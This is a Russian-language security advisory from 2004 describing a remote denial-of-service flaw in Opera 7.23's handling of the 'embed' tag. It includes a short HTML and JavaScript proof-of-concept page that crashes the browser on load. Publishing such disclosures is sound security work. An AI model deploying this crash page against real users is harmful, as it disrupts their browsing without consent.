Удаленный отказ в обслуживании в Opera
| Дата публикации: | 04.09.2004 |
| Всего просмотров: | 1775 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Opera 7.23 build 3227
Описание: Уязвимость обнаружена в браузере Opera в обработке 'embed' тэга. Удаленный пользователь может создать HTML, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера целевого пользователя. Пример/Эксплоит:
<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>
</head>
<body onLoad="dSend()">
<embed src="" type="CCCC" name="crash" >
</embed>
</body>
</html>
URL производителя: http://www.opera.com/ Решение:Опера 7.21 не уязвима. |
|
| Ссылки: | Opera DOS |